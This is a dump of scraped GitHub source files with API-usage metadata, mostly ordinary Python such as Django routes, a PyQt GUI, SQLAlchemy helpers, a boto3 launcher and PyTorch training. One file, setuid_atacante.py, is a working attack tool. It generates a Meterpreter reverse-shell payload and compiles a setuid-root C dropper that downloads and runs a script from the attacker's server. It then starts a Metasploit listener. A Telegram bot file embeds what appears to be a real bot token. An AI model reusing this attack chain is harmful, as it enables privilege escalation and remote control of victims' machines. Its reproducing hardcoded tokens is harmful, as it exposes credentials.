"usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 142, "usage_type": "attribute"}, {"api_name": "datetime.timezone", "line_number": 142, "usage_type": "attribute"}, {"api_name": "datetime.datetime.now", "line_number": 147, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 147, "usage_type": "attribute"}, {"api_name": "datetime.timezone", "line_number": 147, "usage_type": "attribute"}, {"api_name": "redbot.core.bank.get_currency_name", "line_number": 150, "usage_type": "call"}, {"api_name": "redbot.core.bank", "line_number": 150, "usage_type": "name"}, {"api_name": "redbot.core.bank.get_balance", "line_number": 151, "usage_type": "call"}, {"api_name": "redbot.core.bank", "line_number": 151, "usage_type": "name"}, {"api_name": "redbot.core.bank.deposit_credits", "line_number": 153, "usage_type": "call"}, {"api_name": "redbot.core.bank", "line_number": 153, "usage_type": "name"}, {"api_name": "redbot.core.bank.errors", "line_number": 154, "usage_type": "attribute"}, {"api_name": "redbot.core.bank", "line_number": 154, "usage_type": "name"}, {"api_name": "redbot.core.bank.set_balance", "line_number": 155, "usage_type": "call"}, {"api_name": "redbot.core.bank", "line_number": 155, "usage_type": "name"}, {"api_name": "redbot.core.bank.get_balance", "line_number": 156, "usage_type": "call"}, {"api_name": "redbot.core.bank", "line_number": 156, "usage_type": "name"}, {"api_name": "redbot.core.utils.chat_formatting.humanize_number", "line_number": 159, "usage_type": "call"}, {"api_name": "discord.Embed", "line_number": 163, "usage_type": "call"}, {"api_name": "datetime.datetime.now", "line_number": 179, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 179, "usage_type": "attribute"}, {"api_name": "datetime.timezone", "line_number": 179, "usage_type": "attribute"}, {"api_name": "redbot.core.bank.get_balance", "line_number": 183, "usage_type": "call"}, {"api_name": "redbot.core.bank", "line_number": 183, "usage_type": "name"}, {"api_name": "redbot.core.commands.command", "line_number": 131, "usage_type": "call"}, {"api_name": "redbot.core.commands", "line_number": 131, "usage_type": "name"}, {"api_name": "redbot.core.commands.guild_only", "line_number": 132, "usage_type": "call"}, {"api_name": "redbot.core.commands", "line_number": 132, "usage_type": "name"}, {"api_name": "redbot.core.bank.get_balance", "line_number": 194, "usage_type": "call"}, {"api_name": "redbot.core.bank", "line_number": 194, "usage_type": "name"}, {"api_name": "redbot.core.bank.get_currency_name", "line_number": 195, "usage_type": "call"}, {"api_name": "redbot.core.bank", "line_number": 195, "usage_type": "name"}, {"api_name": "redbot.core.utils.chat_formatting.humanize_number", "line_number": 196, "usage_type": "call"}, {"api_name": "redbot.core.commands.command", "line_number": 188, "usage_type": "call"}, {"api_name": "redbot.core.commands", "line_number": 188, "usage_type": "name"}, {"api_name": "redbot.core.commands.guild_only", "line_number": 189, "usage_type": "call"}, {"api_name": "redbot.core.commands", "line_number": 189, "usage_type": "name"}, {"api_name": "random.randint", "line_number": 205, "usage_type": "call"}, {"api_name": "random.choice", "line_number": 206, "usage_type": "call"}, {"api_name": "redbot.core.bank.get_currency_name", "line_number": 207, "usage_type": "call"}, {"api_name": "redbot.core.bank", "line_number": 207, "usage_type": "name"}, {"api_name": "redbot.core.bank.withdraw_credits", "line_number": 213, "usage_type": "call"}, 
{"api_name": "redbot.core.bank", "line_number": 213, "usage_type": "name"}, {"api_name": "redbot.core.bank.set_balance", "line_number": 219, "usage_type": "call"}, {"api_name": "redbot.core.bank", "line_number": 219, "usage_type": "name"}, {"api_name": "redbot.core.bank.deposit_credits", "line_number": 222, "usage_type": "call"}, {"api_name": "redbot.core.bank", "line_number": 222, "usage_type": "name"}, {"api_name": "redbot.core.bank.errors", "line_number": 223, "usage_type": "attribute"}, {"api_name": "redbot.core.bank", "line_number": 223, "usage_type": "name"}, {"api_name": "redbot.core.bank.set_balance", "line_number": 224, "usage_type": "call"}, {"api_name": "redbot.core.bank", "line_number": 224, "usage_type": "name"}, {"api_name": "redbot.core.commands.command", "line_number": 198, "usage_type": "call"}, {"api_name": "redbot.core.commands", "line_number": 198, "usage_type": "name"}, {"api_name": "redbot.core.commands.cooldown", "line_number": 199, "usage_type": "call"}, {"api_name": "redbot.core.commands", "line_number": 199, "usage_type": "name"}, {"api_name": "redbot.core.commands.BucketType", "line_number": 199, "usage_type": "attribute"}, {"api_name": "redbot.core.commands.guild_only", "line_number": 200, "usage_type": "call"}, {"api_name": "redbot.core.commands", "line_number": 200, "usage_type": "name"}]} +{"seq_id": "22851795837", "text": "from django.urls import path\nfrom django.urls.resolvers import URLPattern\nfrom .views import(\n DealerListView,\n DealerDetailView,\n)\n\napp_name = 'dealers'\nurlpatterns = [\n path('', DealerListView.as_view(), name='dealer_list'),\n path('/', DealerDetailView.as_view(), name='dealer_detail'),\n]", "repo_name": "Avineswaran/project2django", "sub_path": "Ecommerce/dealer/urls.py", "file_name": "urls.py", "file_ext": "py", "file_size_in_byte": 310, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "41", "api": [{"api_name": "django.urls.path", "line_number": 10, "usage_type": "call"}, {"api_name": "views.DealerListView.as_view", "line_number": 10, "usage_type": "call"}, {"api_name": "views.DealerListView", "line_number": 10, "usage_type": "name"}, {"api_name": "django.urls.path", "line_number": 11, "usage_type": "call"}, {"api_name": "views.DealerDetailView.as_view", "line_number": 11, "usage_type": "call"}, {"api_name": "views.DealerDetailView", "line_number": 11, "usage_type": "name"}]} +{"seq_id": "38353238253", "text": "# -*- coding: utf-8 -*-\nfrom PyQt5 import QtCore, QtGui, QtWidgets\nfrom PyQt5.QtCore import *\nfrom PyQt5.QtWidgets import *\nimport sys\nfrom vegatables import Ui_MainWindow\nfrom jiamubiao import *\n\n\nclass MainWindow(QMainWindow, Ui_MainWindow,Programme_jiamu):\n\n\tstartdatelist = [None,None,None]\n\tenddatelist = [None,None,None]\n\tstrtext = None\n\tdef __init__(self, parent=None):\n\t\tsuper(MainWindow, self).__init__(parent)\n\t\tself.setupUi(self)\n\n\t\tself.starttime.dateChanged['QDate'].connect(self.startdate)\n\t\tself.endtime.dateChanged['QDate'].connect(self.enddate)\n\t\tself.filename.textEdited['QString'].connect(self.setfilename)\n\t\tself.pushButton.clicked.connect(self.createxcel)\n\t\tself.pushButton_2.clicked.connect(self.close)\n\n\tdef startdate(self,QDate):\n\t\tdatetuple = QDate.getDate()\n\t\tself.startdatelist[0] = int(datetuple[0])\n\t\tself.startdatelist[1] = int(datetuple[1])\n\t\tself.startdatelist[2] = int(datetuple[2])\n\n\tdef enddate(self,QDate):\n\t\tdatetuple = QDate.getDate()\n\t\tself.enddatelist[0] = 
int(datetuple[0])\n\t\tself.enddatelist[1] = int(datetuple[1])\n\t\tself.enddatelist[2] = int(datetuple[2])\n\tdef setfilename(self,strtext):\n\t\tself.strtext = strtext + \".xls\"\n\tdef createxcel(self):\n\t\tif self.strtext is not None:\n\t\t\tProgramme_jiamu.get_html(self,self.startdatelist,self.enddatelist,self.strtext)\n\t\t\tQtWidgets.QMessageBox.information(self.pushButton,\"标题\",\"Excel生成成功\")\n\t\telse:\n\t\t\tQtWidgets.QMessageBox.information(self.pushButton,\"标题\",\"请输入文件名\")\n\n\n\n\n\nif __name__ == \"__main__\":\n\tapp = QtWidgets.QApplication(sys.argv)\n\tmyWindow = MainWindow()\n\tmyWindow.show()\n\tsys.exit(app.exec_())\t \n", "repo_name": "VanJason/Crawl_for_gzvegatable", "sub_path": "gzvg.py", "file_name": "gzvg.py", "file_ext": "py", "file_size_in_byte": 1618, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "41", "api": [{"api_name": "vegatables.Ui_MainWindow", "line_number": 10, "usage_type": "name"}, {"api_name": "PyQt5.QtWidgets.QMessageBox.information", "line_number": 41, "usage_type": "call"}, {"api_name": "PyQt5.QtWidgets.QMessageBox", "line_number": 41, "usage_type": "attribute"}, {"api_name": "PyQt5.QtWidgets", "line_number": 41, "usage_type": "name"}, {"api_name": "PyQt5.QtWidgets.QMessageBox.information", "line_number": 43, "usage_type": "call"}, {"api_name": "PyQt5.QtWidgets.QMessageBox", "line_number": 43, "usage_type": "attribute"}, {"api_name": "PyQt5.QtWidgets", "line_number": 43, "usage_type": "name"}, {"api_name": "PyQt5.QtWidgets.QApplication", "line_number": 50, "usage_type": "call"}, {"api_name": "PyQt5.QtWidgets", "line_number": 50, "usage_type": "name"}, {"api_name": "sys.argv", "line_number": 50, "usage_type": "attribute"}, {"api_name": "sys.exit", "line_number": 53, "usage_type": "call"}]} +{"seq_id": "45183678007", "text": "from logging import getLogger\nfrom sqlalchemy import create_engine\nfrom sqlalchemy.engine.reflection import Inspector\nfrom sqlalchemy.ext.declarative import declarative_base as sa_declarative_base\nfrom sqlalchemy.orm import scoped_session\nfrom sqlalchemy.orm import sessionmaker\nfrom sqlalchemy.schema import (\n MetaData,\n Table,\n DropTable,\n ForeignKeyConstraint,\n DropConstraint,\n )\nfrom zope.component import getSiteManager\nfrom zope.sqlalchemy import register\nfrom zope.sqlalchemy.datamanager import STATUS_CHANGED\n\nfrom .interfaces import ISession\n\nlogger = getLogger('mortar_rdb')\n\ndef register_session(url=None,\n name=u'',\n engine=None,\n echo=None,\n transactional=True,\n scoped=True,\n twophase=True):\n \"\"\"\n Create a :class:`~sqlalchemy.orm.session.Session` class and\n register it for later use.\n\n Generally, you'll only need to pass in a :mod:`SQLAlchemy`\n connection URL. If you want to register multiple sessions for a\n particular application, then you should name them.\n If you want to provide specific engine configuration, then you can\n pass in an :class:`~sqlalchemy.engine.base.Engine` instance.\n In that case, you must not pass in a URL.\n\n :param echo: If `True`, then all SQL will be echoed to the python\n logging framework. This option cannot be specified if you pass in\n an engine.\n\n :param scoped: If `True`, then :func:`get_session` will return a distinct\n session for each thread that it is called from but, within that thread,\n it will always return the same session. 
If it is `False`, every call\n to :func:`get_session` will return a new session.\n \n :param transactional:\n\n If `True`, a :mod:`SQLAlchemy` extension will\n be used that that enables the :mod:`transaction` package to\n manage the lifecycle of the SQLAlchemy session (eg:\n :meth:`~sqlalchemy.orm.session.Session.begin`/:meth:`~sqlalchemy.orm.session.Session.commit`/:meth:`~sqlalchemy.orm.session.Session.rollback`).\n This can only be done when scoped sessions are used.\n\n If `False`, you will need to make sure you call\n :meth:`~sqlalchemy.orm.session.Session.begin`/:meth:`~sqlalchemy.orm.session.Session.commit`/:meth:`~sqlalchemy.orm.session.Session.rollback`,\n as appropriate, yourself. \n\n :param twophase: By default two-phase transactions are used where\n supported by the underlying database. Where this causes problems,\n single-phase transactions can be used for all engines by passing this\n parameter as `False`.\n\n \"\"\"\n if (engine and url) or not (engine or url):\n raise TypeError('Must specify engine or url, but not both')\n\n if transactional and not scoped:\n raise TypeError(\n 'Transactions can only be managed when using scoped sessions'\n )\n \n if engine:\n if echo:\n raise TypeError('Cannot specify echo if an engine is passed')\n else:\n engine = create_engine(url, echo=echo)\n\n logger.info('Registering session for %r with name %r',\n engine.url, name)\n\n params = dict(\n bind = engine,\n autoflush=True,\n autocommit=False,\n )\n\n if transactional:\n if twophase and engine.dialect.name in ('postgresql', 'mysql'):\n params['twophase']=True\n\n Session = sessionmaker(**params)\n \n if scoped:\n Session = scoped_session(Session)\n\n if transactional:\n register(Session, initial_state=STATUS_CHANGED)\n \n getSiteManager().registerUtility(\n Session,\n provided=ISession,\n name=name,\n ) \n\ndef drop_tables(engine):\n \"\"\"\n Drop all the tables in the database attached to by the supplied\n engine.\n \n As many foreign key constraints as possible will be dropped\n first making this quite brutal!\n \"\"\"\n # from http://www.sqlalchemy.org/trac/wiki/UsageRecipes/DropEverything\n conn = engine.connect()\n\n inspector = Inspector.from_engine(engine)\n\n # gather all data first before dropping anything.\n # some DBs lock after things have been dropped in \n # a transaction.\n metadata = MetaData()\n\n tbs = []\n for table_name in inspector.get_table_names():\n fks = []\n for fk in inspector.get_foreign_keys(table_name):\n if not fk['name']:\n continue\n fks.append(\n ForeignKeyConstraint((),(),name=fk['name'])\n )\n t = Table(table_name, metadata,*fks)\n tbs.append(t)\n for fkc in fks:\n conn.execute(DropConstraint(fkc, cascade=True))\n\n for table in tbs:\n conn.execute(DropTable(table))\n\ndef get_session(name=u''):\n \"\"\"\n Return a :class:`~sqlalchemy.orm.session.Session` instance from\n the current registry as registered with the supplied `name`.\n \"\"\"\n return getSiteManager().getUtility(ISession,name)()\n\n_bases = {}\n\ndef declarative_base(**kw):\n \"\"\"\n Return a :obj:`Base` as would be returned by\n :func:`~sqlalchemy.ext.declarative.declarative_base`.\n\n Only one :obj:`Base` will exist for each combination of parameters\n that this function is called with. 
If it is called with the same\n combination of parameters more than once, subsequent calls will\n return the existing :obj:`Base`.\n\n This method should be used so that even if more than one package\n used by a project defines models, they will all end up in the\n same :class:`~sqlalchemy.schema.MetaData` instance and all have the\n same declarative registry.\n \"\"\"\n key = tuple(kw.items())\n if key in _bases:\n return _bases[key]\n base = sa_declarative_base(**kw)\n _bases[key] = base\n return base\n", "repo_name": "Mortar/mortar_rdb", "sub_path": "mortar_rdb/__init__.py", "file_name": "__init__.py", "file_ext": "py", "file_size_in_byte": 5830, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 4, "dataset": "github-code", "pt": "41", "api": [{"api_name": "logging.getLogger", "line_number": 20, "usage_type": "call"}, {"api_name": "sqlalchemy.create_engine", "line_number": 79, "usage_type": "call"}, {"api_name": "sqlalchemy.orm.sessionmaker", "line_number": 94, "usage_type": "call"}, {"api_name": "sqlalchemy.orm.scoped_session", "line_number": 97, "usage_type": "call"}, {"api_name": "zope.sqlalchemy.register", "line_number": 100, "usage_type": "call"}, {"api_name": "zope.sqlalchemy.datamanager.STATUS_CHANGED", "line_number": 100, "usage_type": "name"}, {"api_name": "zope.component.getSiteManager", "line_number": 102, "usage_type": "call"}, {"api_name": "interfaces.ISession", "line_number": 104, "usage_type": "name"}, {"api_name": "sqlalchemy.engine.reflection.Inspector.from_engine", "line_number": 119, "usage_type": "call"}, {"api_name": "sqlalchemy.engine.reflection.Inspector", "line_number": 119, "usage_type": "name"}, {"api_name": "sqlalchemy.schema.MetaData", "line_number": 124, "usage_type": "call"}, {"api_name": "sqlalchemy.schema.ForeignKeyConstraint", "line_number": 133, "usage_type": "call"}, {"api_name": "sqlalchemy.schema.Table", "line_number": 135, "usage_type": "call"}, {"api_name": "sqlalchemy.schema.DropConstraint", "line_number": 138, "usage_type": "call"}, {"api_name": "sqlalchemy.schema.DropTable", "line_number": 141, "usage_type": "call"}, {"api_name": "interfaces.ISession", "line_number": 148, "usage_type": "argument"}, {"api_name": "zope.component.getSiteManager", "line_number": 148, "usage_type": "call"}, {"api_name": "sqlalchemy.ext.declarative.declarative_base", "line_number": 170, "usage_type": "call"}]} +{"seq_id": "20369891461", "text": "from telegram.ext import Updater, CommandHandler\r\n\r\n\r\ndef send_poll(update, context):\r\n context.bot.send_poll(chat_id=update.effective_chat.id,\r\n question=\"where are you from ?\",\r\n options=[\r\n \"Uzbekistan\",\r\n \"USA\",\r\n \"UK\"\r\n ])\r\n\r\n\r\ndef runner():\r\n updater = Updater(token=\"5333086108:AAGOz98WcjgaJ5SEg208C_XS7rYVZJ8-eT4\")\r\n dispatcher = updater.dispatcher\r\n\r\n dispatcher.add_handler(CommandHandler('start', send_poll))\r\n\r\n updater.start_polling()\r\n updater.idle()\r\n\r\n\r\nif __name__ == '__main__':\r\n print(\"ishga tushdi ...\")\r\n runner()", "repo_name": "IqrorjonCoder/all-telegrambot-functions", "sub_path": "learn/context/bot/send_poll.py", "file_name": "send_poll.py", "file_ext": "py", "file_size_in_byte": 721, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 4, "dataset": "github-code", "pt": "41", "api": [{"api_name": "telegram.ext.Updater", "line_number": 15, "usage_type": "call"}, {"api_name": "telegram.ext.CommandHandler", "line_number": 18, "usage_type": "call"}]} +{"seq_id": "4234335425", "text": "import boto3,boto.ec2\n\ndef 
create_instance():\n\n script = '''\n #!/bin/sh\n yum -y install httpd\n systemctl enable httpd\n systemctl start httpd.service\n\n mkdir dist\n cd dist\n wget https://lapy113.s3.amazonaws.com/dist.zip\n unzip dist.zip\n cd dist\n\n cp -r * /var/www/html \n '''\n\n try:\n resource_ec2 = boto3.resource('ec2')\n response = resource_ec2.create_instances(\n ImageId='ami-0c2b8ca1dad447f8a',\n MinCount=1,\n MaxCount=1,\n InstanceType='t2.micro',\n KeyName='CS351-SG1',\n SecurityGroups=['launch-wizard-1'],\n UserData=script\n )\n print(response)\n instance = response[0]\n print('Instance created.. waiting to be in running state')\n instance.wait_until_running()\n print('Instance in running.')\n \n print('public dns address: ', get_public_ip(instance))\n \n except Exception as e:\n print(e)\n\ndef start_ec2_instance() :\n try:\n resource_ec2 = boto3.client('ec2')\n instance_id = resource_ec2.describe_instances()['Reservations'][0]['Instances'][0]['InstanceId']\n # instance_id = 'i-0cc89f742692b78c8'\n resource_ec2.start_instances(InstanceIds=[instance_id])\n except Exception as e:\n print(e)\n\ndef get_public_ip(inst):\n client = boto3.client('ec2')\n response = client.describe_instances(InstanceIds=[inst.instance_id])\n public_ipvp4 = response['Reservations'][0]['Instances'][0]['PublicIpAddress']\n return public_ipvp4\n\n# start_ec2_instance()\ncreate_instance()", "repo_name": "lapy113/Cloud-Computing", "sub_path": "ASSIGNMENT 2/BOTO/main.py", "file_name": "main.py", "file_ext": "py", "file_size_in_byte": 1653, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "41", "api": [{"api_name": "boto3.resource", "line_number": 21, "usage_type": "call"}, {"api_name": "boto3.client", "line_number": 44, "usage_type": "call"}, {"api_name": "boto3.client", "line_number": 52, "usage_type": "call"}]} +{"seq_id": "35594400977", "text": "from sqlalchemy.orm import Session\n\nfrom . 
import router, user_repo\nfrom fastapi import Depends\n\nfrom app.depends import get_current_user, get_db\nfrom app.schemas.user_schema import UserProfile, UserOut\n\n\n@router.get('/profile', summary='Get details of currently logged in user', response_model=UserProfile)\nasync def profile(user: UserOut = Depends(get_current_user), db: Session = Depends(get_db)):\n user_profile = user_repo.get_user_by_id(db, user_id=user.id)\n return UserProfile(\n id=user_profile.id,\n email=user_profile.email,\n username=user_profile.username,\n profile_photo=user_profile.profile_photo,\n registered_at=user_profile.registered_at,\n is_active=True,\n is_superuser=user.is_superuser,\n is_moderator=user.is_moderator\n )\n", "repo_name": "arystambek-dimash/tolqyn", "sub_path": "app/routers/user_router/router_profile.py", "file_name": "router_profile.py", "file_ext": "py", "file_size_in_byte": 801, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "41", "api": [{"api_name": "app.schemas.user_schema.UserOut", "line_number": 11, "usage_type": "name"}, {"api_name": "sqlalchemy.orm.Session", "line_number": 11, "usage_type": "name"}, {"api_name": "fastapi.Depends", "line_number": 11, "usage_type": "call"}, {"api_name": "app.depends.get_current_user", "line_number": 11, "usage_type": "argument"}, {"api_name": "app.depends.get_db", "line_number": 11, "usage_type": "argument"}, {"api_name": "app.schemas.user_schema.UserProfile", "line_number": 13, "usage_type": "call"}, {"api_name": "app.schemas.user_schema.UserProfile", "line_number": 10, "usage_type": "name"}]} +{"seq_id": "36936807908", "text": "import os\ntry:\n from colorama import Fore\nexcept ImportError as e:\n os.system(\"pip install colorama\")\n\narchivo_rc = \"setuid_atacante.rc\"\ntipo_payload = \"linux/x86/meterpreter/reverse_tcp\"\ntipo_ejecutable = \"elf\"\nc = \"runscriptSUID.c\"\n\ndef obtener_ip_automaticamente(interfaz):\n comando = f\"ip address | grep {interfaz} | grep inet | awk '\"\"{print $2}\"\"' | head -n 1 > ip.txt\"\n os.system(comando)\n ip = open(\"ip.txt\",\"r\").readlines()\n os.system(\"rm ip.txt\")\n return ip[0].split('/')[0].strip()\n\ndef pedir_dato(enun):\n informar(enun)\n retorno = str(input(f\"{Fore.GREEN} ==> \"))\n return retorno\n\ndef informar(enun):\n print(f\"{Fore.CYAN}==========================================================================================\")\n print(f\"{Fore.RED}[!] 
{enun}\".upper())\n print(f\"{Fore.CYAN}==========================================================================================\")\n\ndef crear_backdoor(ip_local, puerto_escucha):\n payload = pedir_dato(\"INTRODUCE EL NOMBRE DEL PAYLOAD SIN EXTENSION\")\n os.system(f\"msfvenom -p {tipo_payload} LHOST={ip_local} LPORT={puerto_escucha} -f {tipo_ejecutable} -o .{payload}.{tipo_ejecutable}\")\n informar(f\"BACKDOOR GENERADO COMO : .{payload}.{tipo_ejecutable}\")\n return payload \n\ndef levantar_servidor():\n os.system(\"xterm -e sudo python3 -m http.server 80 &\")\n\ndef escribir_rc(ordenes_rc):\n informar(\"Creando Archivo RC ...\")\n for orden in ordenes_rc:\n print(f\"{Fore.BLUE}{orden}\")\n os.system(f\"echo {orden} >> {archivo_rc}\")\n\n informar(f\"{archivo_rc} GENERADO CON EXITO\")\n\ndef escribir_archivo(servidor, archivo):\n codigo = \"\"\"#include \n#include \n#include \n#include \n\nint main(){\n setuid(0);\n system(\"wget http://\"\"\" + servidor + \"\"\"/setuid_victima.py\");\n system(\"python3 setuid_victima.py -r \"\"\" + servidor + \"\"\" -e \"\"\" + archivo + \"\"\" -x \"\"\" + tipo_ejecutable + \"\"\" \");\n return 0;\n}\n\"\"\"\n f = open(c , \"w\")\n f.write(codigo)\n f.close()\n\ndef lanza_metasploit():\n os.system(f\"msfconsole -q -r {archivo_rc}\")\n\ndef configurar_archivo(ip, payload):\n informar(\"Generando Archivo C \")\n escribir_archivo(ip, payload)\n os.system(f\"cat {c}\")\n conf = pedir_dato(f\"Desea modificar el archivo {c} antes de compilarlo ? [S/n] \")\n if len(conf) == 0 or conf[0].upper() == \"S\":\n os.system(f\"nano {c}\")\n informar(f\"COMPILANDO {c} a SUID\")\n os.system(f\"gcc {c} -o SUID\")\n informar(f\"Eliminando {c}\")\n os.system(f\"rm {c}\")\n\ndef main():\n interfaz = pedir_dato(\"INTRODUCE la interfaz conectada a internet\")\n ip = obtener_ip_automaticamente(interfaz)\n puerto = pedir_dato(\"INTRODUCE EL PUERTO A LA ESCUCHA DEL PAYLOAD\")\n informar(f\"IP DETECTADA : {ip}\")\n ordenes_rc = [\n \"use exploit/multi/handler\",\n f\"set PAYLOAD {tipo_payload}\",\n f\"set LHOST {ip}\",\n f\"set LPORT {puerto}\",\n \"exploit\"]\n escribir_rc(ordenes_rc)\n gen = pedir_dato(\"DESEA CREAR UN PAYLOAD?[S/n]\")\n if len(gen) == 0 or gen[0].upper() == \"S\":\n payload = crear_backdoor(ip, puerto)\n configurar_archivo(ip, payload)\n informar(\"NECESITO PERMISOS PARA LEVANTAR UN SERVIDOR WEB\")\n levantar_servidor()\n\n lanza_metasploit()\n informar(f\"LIMPIANDO {archivo_rc}\")\n os.system(f\"rm {archivo_rc}\")\n\nif __name__ == '__main__':\n main()\n", "repo_name": "AdrianGomezMartin/ExplotacionSUID", "sub_path": "setuid_atacante.py", "file_name": "setuid_atacante.py", "file_ext": "py", "file_size_in_byte": 3356, "program_lang": "python", "lang": "es", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "41", "api": [{"api_name": "os.system", "line_number": 5, "usage_type": "call"}, {"api_name": "os.system", "line_number": 14, "usage_type": "call"}, {"api_name": "os.system", "line_number": 16, "usage_type": "call"}, {"api_name": "colorama.Fore.GREEN", "line_number": 21, "usage_type": "attribute"}, {"api_name": "colorama.Fore", "line_number": 21, "usage_type": "name"}, {"api_name": "colorama.Fore.CYAN", "line_number": 25, "usage_type": "attribute"}, {"api_name": "colorama.Fore", "line_number": 25, "usage_type": "name"}, {"api_name": "colorama.Fore.RED", "line_number": 26, "usage_type": "attribute"}, {"api_name": "colorama.Fore", "line_number": 26, "usage_type": "name"}, {"api_name": "colorama.Fore.CYAN", "line_number": 27, "usage_type": 
"attribute"}, {"api_name": "colorama.Fore", "line_number": 27, "usage_type": "name"}, {"api_name": "os.system", "line_number": 31, "usage_type": "call"}, {"api_name": "os.system", "line_number": 36, "usage_type": "call"}, {"api_name": "colorama.Fore.BLUE", "line_number": 41, "usage_type": "attribute"}, {"api_name": "colorama.Fore", "line_number": 41, "usage_type": "name"}, {"api_name": "os.system", "line_number": 42, "usage_type": "call"}, {"api_name": "os.system", "line_number": 64, "usage_type": "call"}, {"api_name": "os.system", "line_number": 69, "usage_type": "call"}, {"api_name": "os.system", "line_number": 72, "usage_type": "call"}, {"api_name": "os.system", "line_number": 74, "usage_type": "call"}, {"api_name": "os.system", "line_number": 76, "usage_type": "call"}, {"api_name": "os.system", "line_number": 99, "usage_type": "call"}]} +{"seq_id": "16567000882", "text": "import pandas as pd\nfrom pathlib import Path\nimport numpy as np\n\nclass_num = 4\nlist_labels = [[] for i in range(class_num)]\n\ntrain_type = 'wide_angle'\ndata_version = 'v5'\n\ncsv_all = Path(__file__).parent.parent.absolute().joinpath('datafiles', data_version, 'all.csv')\ncsv_train = Path(__file__).parent.parent.absolute().joinpath('datafiles', data_version, 'train.csv')\ncsv_valid = Path(__file__).parent.parent.absolute().joinpath('datafiles', data_version, 'valid.csv')\ncsv_test = Path(__file__).parent.parent.absolute().joinpath('datafiles', data_version, 'test.csv')\n\n\ndf = pd.read_csv(csv_all)\n\nfor index, row in df.iterrows():\n list_tmp = row['labels'].split('_')\n for index, label in enumerate(list_tmp):\n list_labels[index].append(int(label))\n\nfor i in range(class_num):\n list_np = np.array(list_labels[i])\n print(f'class no:{i}')\n print(f'label 0:{np.sum(list_np == 0)}, label 0:{np.sum(list_np == 1)}')\n\n\nprint('OK')\n\n'''\n单纯性的格子样变性', '单纯性的孔源性视网膜脱离', '单纯性的视网膜破裂孔', '囊性视网膜突起'\nclass no:0\nlabel 0:5131, label 0:827\nclass no:1\nlabel 0:5005, label 0:953\nclass no:2\nlabel 0:4947, label 0:1011\nclass no:3\nlabel 0:5893, label 0:65\n'''\n", "repo_name": "linchundan88/WideAngleFundus", "sub_path": "train/my_label_distribution.py", "file_name": "my_label_distribution.py", "file_ext": "py", "file_size_in_byte": 1233, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "41", "api": [{"api_name": "pathlib.Path", "line_number": 11, "usage_type": "call"}, {"api_name": "pathlib.Path", "line_number": 12, "usage_type": "call"}, {"api_name": "pathlib.Path", "line_number": 13, "usage_type": "call"}, {"api_name": "pathlib.Path", "line_number": 14, "usage_type": "call"}, {"api_name": "pandas.read_csv", "line_number": 17, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 25, "usage_type": "call"}, {"api_name": "numpy.sum", "line_number": 27, "usage_type": "call"}]} +{"seq_id": "8357933268", "text": "# in this modiule the register is created and the data is then send to the DB.\n# this module provides callback function to the modules that registers.\n\n\nimport logging\nimport actuatordbmod\nimport sensordbmod\nimport statusdataDBmod\n\n\nlogger = logging.getLogger(\"hydrosys4.\"+__name__)\nREGISTER={}\n\ncallbacklist=[]\n\ndef register_input_value(name,value,saveonDB=True):\n print (\"register calls here\")\n statusdataDBmod.write_status_data(REGISTER,\"input\",name,value)\n for callback in callbacklist:\n print(\"start callback\")\n callback(\"input\",name,value)\n if saveonDB:\n sensordbmod.insertdataintable(name,value)\n\n\ndef 
register_output_value(name,value,saveonDB=True):\n    statusdataDBmod.write_status_data(REGISTER,\"output\",name,value)\n    for callback in callbacklist:\n        callback(\"output\",name,value)\n    if saveonDB:\n        if value==\"ON\":\n            value=\"1\"\n        actuatordbmod.insertdataintable(name,value)\n\ndef register_callback(callback_func):\n    print(\"append the callback ----------------------------\")\n    global callbacklist\n    callbacklist.append(callback_func)\n\nif __name__ == '__main__':\n    \n    print(\"Hello\")\n", "repo_name": "Hydrosys4/Master", "sub_path": "REGandDBmod.py", "file_name": "REGandDBmod.py", "file_ext": "py", "file_size_in_byte": 1163, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 65, "dataset": "github-code", "pt": "41", "api": [{"api_name": "logging.getLogger", "line_number": 11, "usage_type": "call"}, {"api_name": "statusdataDBmod.write_status_data", "line_number": 18, "usage_type": "call"}, {"api_name": "sensordbmod.insertdataintable", "line_number": 23, "usage_type": "call"}, {"api_name": "statusdataDBmod.write_status_data", "line_number": 27, "usage_type": "call"}, {"api_name": "actuatordbmod.insertdataintable", "line_number": 33, "usage_type": "call"}]} +{"seq_id": "16567000882", "text": "import torch\nfrom torch.autograd import Variable\nimport torch.nn as nn\nimport torch.nn.functional as F\nimport os\nimport numpy as np\nimport time\nfrom src.training import prep_tile\nfrom classifierLoading import tile_dataloader\nfrom net import ResidualBlock, Net\nimport multiprocessing\nfrom torch import optim\nfrom time import time\n\nimport argparse\n\ncuda = torch.cuda.is_available()\nparser = argparse.ArgumentParser(description='PyTorch Example')\nparser.add_argument('--disable-cuda', action='store_true',\n                    help='Disable CUDA')\nargs = parser.parse_args()\nargs.device = None\nif not args.disable_cuda and torch.cuda.is_available():\n    args.device = torch.device('cuda')\nelse:\n    args.device = torch.device('cpu')\n\ndevice = args.device\nprint(device)\n\nprint(\"Using {} cpu cores\".format(multiprocessing.cpu_count()))\ntorch.set_num_threads(multiprocessing.cpu_count())\n\n\n# Setting up the model\nz_dim = 64\nnum_blocks = [2, 2, 2, 2, 2]\nin_channels = 4\nmodel = Net(in_channels=in_channels, num_blocks=num_blocks, z_dim=z_dim)\nmodel_dict = model.state_dict()\ncheckpoint = torch.load(os.path.join(\n    \"models\", \"all_of_sent\"))\n#checkpoint = {k: v for k, v in checkpoint.items() if k in model_dict}\nmodel_dict.update(checkpoint)\nmodel.load_state_dict(model_dict)\nfor param in model.parameters():\n    param.requires_grad = False\nfor idx, child in enumerate(model.children()):\n    if idx < 2 or idx > 6:\n        for param in child.parameters():\n            param.requires_grad = True\nmodel = model.to(device=device)\nmodel = model.train()\nprint(\"Model successfully loaded\")\n\n\nimg_list = []\nfor root, 